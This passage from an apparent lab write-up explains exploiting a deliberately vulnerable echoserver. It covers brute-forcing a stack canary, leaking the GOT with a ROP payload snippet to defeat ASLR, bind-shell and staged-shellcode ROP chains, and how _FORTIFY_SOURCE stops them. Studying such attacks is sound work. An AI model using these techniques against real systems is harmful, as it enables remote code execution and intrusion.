Those observations imply that errors from this exploit might be more related to memory/computational issues than to logical issues concerning the overwritten values.</p>
<p>In conclusion, even though this attack does not always work, it works most of the time. We not only reveal the stack canary but also the saved frame pointer which gives us information about stack addresses and the return address which gives us information about where the executable is loaded into memory.</p>
<h3 id="leaking-the-global-offset-table-and-determining-libc-base-address">Leaking the Global Offset Table and determining libc base address</h3>
<p>As soon as we retrieved stack canary, saved frame pointer and return address (for returning from <code>echo</code>), we can determine the base address at which the executable is loaded into memory. As we have access to the <code>echoserver</code> binary, we can disassemble it (<code>objdump -d echoserver</code> or also with <code>r2 echoserver</code>, if radare2 is preferred; other tools are of course also possible) and determine the offset of the instruction to which the <code>echo</code> function returns. When subtracting this offset from the leaked return instrution pointer, we thus get the executable’s base address in memory.</p>
<p>We can also determine the offset of the global offset table (GOT) in the executable. The next steps are then as follows:</p>
<ol type="1">
<li>Output GOT entries over the socket to the client</li>
<li>Determine libc address of a specified function (here: <code>write</code>)</li>
<li>Determine libc offset of a specified function (here: <code>write</code>)</li>
<li>From address and offset, calculate libc base address</li>
</ol>
<p>The first step is pretty easy thanks to how the executable is compiled. In order to output a GOT entry over the socket, we want to execute <code>write</code> with the necessary parameters. <code>write</code> expects the file descriptor to write to (here: our socket) in register <code>rdi</code>, the address of the buffer to write in <code>rsi</code> and the number of bytes to write in <code>rdx</code>.<br />
This means that we have to find the socket file descriptor and somehow load it into <code>rdi</code>, load the address of a GOT entry into <code>rsi</code> and the number of bytes (preferably 8 bytes == 64 bits for the address) into <code>rdx</code>. As we so far only have the base address of the executable, we could try to build a ROP chain that does exactly what we want just with instructions from the executable. When analysing the executable (e.g. with <code>objdump</code> or <code>ropper</code>), however, we see that we could easily pop information from the stack into <code>rdi</code> (i.e. the file descriptor / socket) but not easily move information from other registers into <code>rdi</code>. We would also have to find the right value on the stack at first, as we cannot determine the file descriptor beforehand and thus put it on the stack manually. Luckily, <code>echo</code> also loads the file descriptor into <code>rdi</code> in order to write the user input back to the user (i.e. in order to echo the user input). As <code>rdi</code> is not overwritten before <code>echo</code> returns, we already have the right file descriptor in <code>rdi</code>.<br />
The approach for <code>rdx</code> (i.e. the number of bytes to write) is similar. It is again not easily possible to find an instruction chain to modify <code>rdx</code> in the way we want. Again, luckily <code>rdx</code> is already filled and not overwritten in <code>echo</code> for the same <code>write</code> operation as <code>rdi</code> above. Here, <code>rdx</code> contains the number of bytes that was read from the socket beforehand (i.e. the length of the user input). Thus, we know that the value of <code>rdx</code> is somewhere between 256 (at least 256 bytes needed for a buffer overflow) and 1024 (maximum number of bytes specified in the <code>read</code> function call). The approach is then to not only leak one specified address but the whole start of the GOT and then extract the gathered information from the GOT output. This allows to compare the libc addresses of different functions which might be necessary to determine the libc version (if not known) by finding identifying offset patterns between functions in libc.<br />
Last but not least <code>rsi</code> has to be prepared with the address where we want to read from (i.e. the GOT address). As described above, we can determine this address with the help of the leaked base address of the executable. With a <code>pop rsi; pop r15; ret</code> instruction chain found in the executable, we can then just put this address onto the stack and pop it into <code>rsi</code>.</p>
<p>The payload (as found in <a href="./Stack%20canary%20bypassing/poc.py#L62">poc.py</a>) is then as follows:</p>
<div class="sourceCode" id="cb30"><pre class="sourceCode python"><code class="sourceCode python"><a class="sourceLine" id="cb30-1" data-line-number="1">payload <span class="op">=</span> b<span class="st">''</span></a>
<a class="sourceLine" id="cb30-2" data-line-number="2">payload <span class="op">+=</span> b<span class="st">'A'</span> <span class="op">*</span> <span class="dv">264</span>       <span class="co"># Padding</span></a>
<a class="sourceLine" id="cb30-3" data-line-number="3">payload <span class="op">+=</span> canary           <span class="co"># Stack canary</span></a>
<a class="sourceLine" id="cb30-4" data-line-number="4">payload <span class="op">+=</span> sfp              <span class="co"># Saved frame pointer</span></a>
<a class="sourceLine" id="cb30-5" data-line-number="5">payload <span class="op">+=</span> poprsi_addr      <span class="co"># pop rsi; pop r15; ret address</span></a>
<a class="sourceLine" id="cb30-6" data-line-number="6">payload <span class="op">+=</span> got_addr         <span class="co"># GOT address to pop into rsi</span></a>
<a class="sourceLine" id="cb30-7" data-line-number="7">payload <span class="op">+=</span> p64(<span class="bn">0x0</span>)         <span class="co"># Junk to pop into r15</span></a>
<a class="sourceLine" id="cb30-8" data-line-number="8">payload <span class="op">+=</span> write_addr       <span class="co"># Write instruction to return to (destination file descriptor set in echo, number of bytes set in echo)</span></a></code></pre></div>
<p>This code lets the executable return to the <code>pop rsi; pop r15; ret</code> instruction chain, pops the GOT address into <code>rsi</code> and then returns to the <code>write</code> function call in <code>main</code> which then outputs GOT contents to the client.</p>
<p>It is then easy to find the libc address of a function (here: <code>write</code>) in the output, determine the offset in libc (e.g. with <code>readelf -s /lib/x86_64-linux-gnu/libc.so.6 | grep write</code>) and then calculate the libc base address from the function’s address and its offset in libc.</p>
<p>The base address at which libc is loaded into memory can then be used in further exploits as we then can call arbitrary functions from libc or also have way more instructions for building ROP chains at our hands. Thus, we can effectively not only bypass stack canaries but also ASLR if we manage to also leak the saved frame pointer and the return instruction pointer.</p>
<h3 id="executing-arbitrary-code">Executing arbitrary code</h3>
<p>We basically already executed arbitrary code when <a href="#leaking-the-global-offset-table-and-determining-libc-base-address">leaking the GOT</a>. Because we could calculate the base address at which the executable was loaded, we were able to calculate addresses of instructions to return the data in the GOT over the network.<br />
With that, we can also calculate the base address of libc which gives us a lot more opportunities to create an exploit.</p>
<p>The easiest exploit is just to <a href="./Stack%20canary%20bypassing/poc.py#L79">spawn a shell</a>. This exploit just takes the address of a “/bin/sh” string found in libc and passes it to a call to <code>system()</code>. The necessary addresses can be easily calculated by the offsets found in the binaries (executable and libc) and the leaked base addresses.<br />
Of course this exploit is not of great use, as it spawns the shell in the server process, i.e. the shell opens up on the server side with the client not being connected to it. Thus, only somebody having access to the server itself can input something onto the shell command line.</p>
<p>A more sophisticated and useful attack is to bind a shell to a TCP port so that we can easily connect to the shell over the network (e.g. with <code>netcat</code>). This exploit has to be conducted in several steps:</p>
<ol type="1">
<li>Create a socket</li>
<li>Bind the socket to a port and listen for connections</li>
<li>On incoming connections: redirect <code>stdin</code>, <code>stdout</code> and <code>stderr</code> to connection socket</li>
<li>Replace current process with shell (“/bin/sh”)</li>
</ol>
<p>The necessary functions (<code>socket</code>, <code>bind</code>, <code>dup2</code>, <code>execve</code>, etc.) can all be found in libc. This means that we only have to prepare the registers containing the arguments to those functions in the right way with the help of ROP gadgets (i.e. short assembly instruction chains ending in <code>ret</code>, found for example with <code>ropper -f /lib/x86_64-linux-gnu/libc.so.6</code>) and can then directly return to those functions. In the end, we basically didn’t put shellcode onto the stack but only the addresses to parts of the shellcode which are executed so that a shell is bound to a TCP port.</p>
<p>However, there are several problems with this kind of exploit: Firstly, the exploit is relying on the server not using any string functions (like e.g. <code>strcpy</code>, <code>fgets</code>, etc.) but only the <code>read</code> function which reads binary data. As the <a href="./Stack%20canary%20bypassing/poc.py#L111">exploit code</a> contains a lot of <code>0x00</code> bytes, any string-based function would interpret such bytes as the end of the string and ignore any important data after such a byte.<br />
Secondly, we here have a buffer of size 256 bytes that we overflow with a maximum of 1024 bytes (c.f. <a href="./Stack%20canary%20bypassing/echoserver.c#L14">echoserver.c, lines 14 and 19</a>). If our ROP chain was even longer than it already is or the <code>read</code> function didn’t read up to 1024 bytes but far less, we would not be able to put such huge amounts of data into the buffer and overflow it correctly. As we’re putting lots of addresses onto the stack and each address is 64 bits (== 8 bytes), the payload for the exploit quickly becomes very big. Pure shellcode doing exactly what was described above <a href="https://www.exploit-db.com/shellcodes/46979">is in the range of around 100 bytes</a>, whereas the payload for this exploit is in the range of around 700 - 800 bytes.</p>
<p>As already mentioned above, this exploit only works if the resulting payload is less than 1024 bytes long in this case. A possibility to work around this restriction is to not include the actual exploit code we want to execute in the end in the initial overflow payload but to let the overflow payload allocate memory, read from the network socket to this memory and then execute the content of that memory. The steps are then as follows:</p>
<ol type="1">
<li>Allocate memory</li>
<li>Mark allocated memory as executable</li>
<li>Read shellcode from socket and write it to this memory</li>
<li>Execute the shellcode</li>
</ol>
<p>The code for this exploit can be found in <a href="./Stack%20canary%20bypassing/poc.py#L199">poc.py</a>.</p>
<p>As long as we allocate enough memory in the first place, our shellcode is basically not restricted in length. The original payload shrinks down from around 770 bytes to around 490 bytes.<br />
Apart from the shorter payload and the basically unrestricted length of the shellcode, the other restrictions as explained above still apply.</p>
<p>All in all, a single buffer overflow vulnerability in a server application can lead to arbitrary code execution. However, at least in our case, there are several prerequisites which make the exploit possible, namely binary operations instead of string operations (i.e. <code>read</code> and <code>write</code>), the distinguishability between a successful call to the server (returns “OK”) and a crash, the huge amount of data to be read over the network for the initial overflow (1024 bytes), etc.</p>
<h2 id="optimizing-compilation-3">Optimizing compilation</h2>
<p>Similar to the previous sections, the results differ when compiling with compiler optimizations enabled via the <code>-O3</code> compiler flag.</p>
<h3 id="stack-analysis---getcanary-and-getcanarythreaded-1">Stack analysis - <code>getCanary</code> and <code>getCanaryThreaded</code></h3>
<p>Those two executables still work just as <a href="#stack-analysis---getcanary-and-getcanarythreaded">previously</a> described. The only difference is that the stack layout is a little bit different because some stack variables were optimized away and/or are now only kept in registers.</p>
<p>For example, in the <code>getCanary</code> executable the array <code>uint8_t buf[8]</code> in <code>main</code> is optimized away as it is never reused after it is initialized and its value is set. Additionally, <code>uint64_t *ptr</code> and <code>uint64_t i</code> in <code>func</code> are omitted because instead of setting a base address (<code>ptr</code>) and adding to or subtracting from that address and additionally keeping a counter (<code>i</code>) for comparisons, a base address (<code>buf - 0x18</code> == <code>buf - 24</code> == <code>ptr - 3</code> as <code>ptr</code> is a pointer to an 8 bytes wide value and <code>buf</code> is a pointer to an 1 byte wide value) is used, incremented by 8 (bytes) on each iteration and directly compared to a target address (<code>buf + 0x88</code> == <code>buf + 136</code> == <code>ptr + 17</code>).</p>
<p>Apart from such smaller changes, the executables still work as expected and output stack contents, including the stack canaries which can still be identified as they can be found directly after the buffer that was filled with the value <code>0x41</code> (which is the hexadecimal representation of the ASCII letter A).</p>
<h3 id="brute-force-leaking-1">Brute force leaking</h3>
<p>The Linux man page for <code>feature_test_macros</code> (shell command <code>man feature_test_macros</code> or found <a href="http://man7.org/linux/man-pages/man7/feature_test_macros.7.html">on web versions of the man page</a>) states the following:</p>
<blockquote>
<p>If _FORTIFY_SOURCE is set to 1, with compiler optimization level 1 (gcc -O1) and above, checks that shouldn’t change the behavior of conforming programs are performed. With _FORTIFY_SOURCE set to 2, some more checking is added, but some conforming programs might fail.</p>
</blockquote>
<p>Because of _FORTIFY_SOURCE being set to 2 by default, the stack canary leaking from the <code>echoserver</code> executable does not work anymore. Instead of making a call to <code>read</code> in the <code>echo</code> function, <code>__read_chk</code> is called. This function is a wrapper around <code>read</code> which checks for buffer overflows on runtime. As the call to <code>read</code> is intentionally vulnerable, this overflow check yields a positive result (i.e. an overflow is detected) and thus cancels the operation and kills the program before the overflow can be exploited. Thus, it is not possible to leak the stack canary with such measures enabled.</p>
<p>If adding the <code>-U_FORTIFY_SOURCE -D_FORTIFY_SOURCE=0</code> compiler flags, such checks are disabled and the stack canary can be leaked in exactly the same way as it was the case for the non-optimized version of the <code>echoserver</code> executable. Even though some optimizations are made (e.g. keeping the <code>int fd</code> argument to the <code>echo</code> function and the <code>ssize_t n</code> variable only in registers instead of putting them on the stack) and the stack layout thus may differ, no inlining or otherwise destructive (destructive concerning the success of the exploit) optimizations are made by the compiler.</p>
<h3 id="extended-brute-force-leaking-1">Extended brute force leaking</h3>
<p>As the exploits for <a href="#leaking-saved-frame-pointer-and-return-instruction-pointer-return-address">leaking the return address</a> (brute force guessing by stack buffer overflow) and <a href="#leaking-the-global-offset-table-and-determining-libc-base-address">leaking the GOT</a> in order to bypass ASLR as well as the exploits for <a href="#executing-arbitrary-code">code execution</a> based on those leaks all need to overflow the vulnerable stack buffer, they are subject to the <code>_FORTIFY_SOURCE</code> protection mechanism as described in the <a href="#brute-force-leaking-1">previous section</a> just like the brute force attempt for leaking the stack canary. This means that simply activating compiler optimizations already prevents a malicious client of overflowing the buffer in the server and thus leak stack information and finally gain control over the control flow.</p>
<p>The exploit thus is still able to run a DoS (Denial of Service) attack against the server by crashing it but cannot influence control flow. Even the DoS attack does not have any significant impact, as it is only targeted on a child process of the main server process and thus only crashes the child process so that future connections to the main process are still possible.</p>
<p>With the <code>-U_FORTIFY_SOURCE -D_FORTIFY_SOURCE=0</code> compiler flags set, the exploits work just like they did before with some smaller adjustments to offsets, addresses and padding lengths. This is due to the different structure of the executable and the stack when running the executable.</p>
<p>For example, in the non-optimized executable we had the following stack layout in the <code>echo</code> function:</p>
<pre><code>higher address  |                                   |
                +-----------------------------------+  ---+
                | return address                    |     |
                +-----------------------------------+     |
                | saved frame pointer               |     |
                +-----------------------------------+     |
                | stack canary                      |     |
                +-----------------------------------+     |
                | unreferenced junk                 |     |
                +-----------------------------------+     |
                | char buffer[255 - 248]            |     |
                | char buffer[247 - 240]            |     +--- stack frame of echo
                |            ...                    |     |
                | char buffer[15 - 8]               |     |
                | char buffer[7 - 0]                |     |
                +-----------------------------------+     |
                | ssize_t n                         |     |
                +-----------------------------------+     |
                | uint64_t *canary                  |     |
                +-----------------+-----------------+     |
                | copy of int fd  |       junk      |     |
                +-----------------+-----------------+  ---+
lower address   |                                   |</code></pre>
<p>The stack layout for the optimized executable looks a little bit different:</p>
<pre><code>higher address  |                                   |
                +-----------------------------------+  ---+
                | return address                    |     |
                +-----------------------------------+     |
                | saved r12 contents (junk)         |     |
                +-----------------------------------+     |
                | saved ebp contents (socket)       |     |
                +-----------------------------------+     |
                | unreferenced junk                 |     |
                +-----------------------------------+     |
                | stack canary                      |     +--- stack frame of echo
                +-----------------------------------+     |
                | unreferenced junk                 |     |
                +-----------------------------------+     |
                | char buffer[255 - 248]            |     |
                | char buffer[247 - 240]            |     |
                |            ...                    |     |
                | char buffer[15 - 8]               |     |
                | char buffer[7 - 0]                |     |
                +-----------------------------------+  ---+
lower address   |                                   |</code></pre>
<p>In both cases, each line refers to 8 bytes. The stack frame of the <code>echoserver</code> executable compiled with compiler optimizations enabled has 8 bytes of unused space twice whereas the executable compiled without compiler optimizations allocates a total of 12 bytes of unused space on the stack in the <code>echo</code> function. The first one between the saved registers and the stack canary is caused by decrementing <code>rsp</code> by <code>0x118</code> and writing the stack canary to <code>rsp + 0x108</code>. The second one is caused by the buffer being located at position <code>rsp</code> (after decrementing the stack pointer of course) and thus occupying the space up to and including <code>rsp + 0xff</code> (i.e. 256 bytes) whereas the next important object (the stack canary) is located at <code>rsp + 0x108</code>. This is probably due to stack alignment requirements.</p>
<p>Those changes in the stack layout make it necessary to account for the additional stack space (the space for the saved <code>r12</code> register as well as the unreferenced stack space) when padding the string to overflow the buffer and overwrite the canary and the return address. Additionally, offsets based on the <code>echoserver</code> executable have to be changed, as the binary’s structure of course is different when compiled with the <code>-O3</code> flag. Fortunately, those are just smaller changes (reflected in the <a href="./Stack%20canary%20bypassing/poc_optimized.py">poc_optimized.py</a> Python script), as the main parts of the exploit are based on assembly instructions taken from libc. As the linked libc doesn’t change, the offsets for those instructions also stay the same.</p>
<p>An important change is concerning the return address leaking. As the Procedure Linkage Table (PLT) in the optimized executable is located directly before the <code>main</code> function and the offsets are so that when brute forcing the last byte of the return address the <code>echo</code> function returns to the PLT entry of <code>fork</code> over and over again, it is not possibly to leak the return address without creating a lot of child processes which quickly fill up the memory.<br />
To prevent this problem from occurring, it is necessary to fix the last return address byte in the exploit script in order to not have this problematic offset when returning from <code>echo</code>. As the last address byte always stays the same (independent of ASLR, as the last byte is not randomized), we do not weaken the ASLR bypassing functionality with this measure. In fact, for all of the exploits we assumed having access to the executable binary file in order to analyze it (to find the right stack offsets as well as useful assembly instructions to return to). Under this assumption, we could of course also easily determine the last return address byte from the executable which is why this measure does not impose any additional prerequisites on the exploits to work.</p>
<p>All in all, the provided exploits for leaking addresses, thus bypassing ASLR and therefore fully controlling the execution flow are basically worthless without setting the <code>-U_FORTIFY_SOURCE -D_FORTIFY_SOURCE=0</code> compiler flags. With those flags set, there is basically not much of a difference for the exploit complexity whether the executable is compiled with optimizations enabled or not.</p>
</article>
</body>
</html>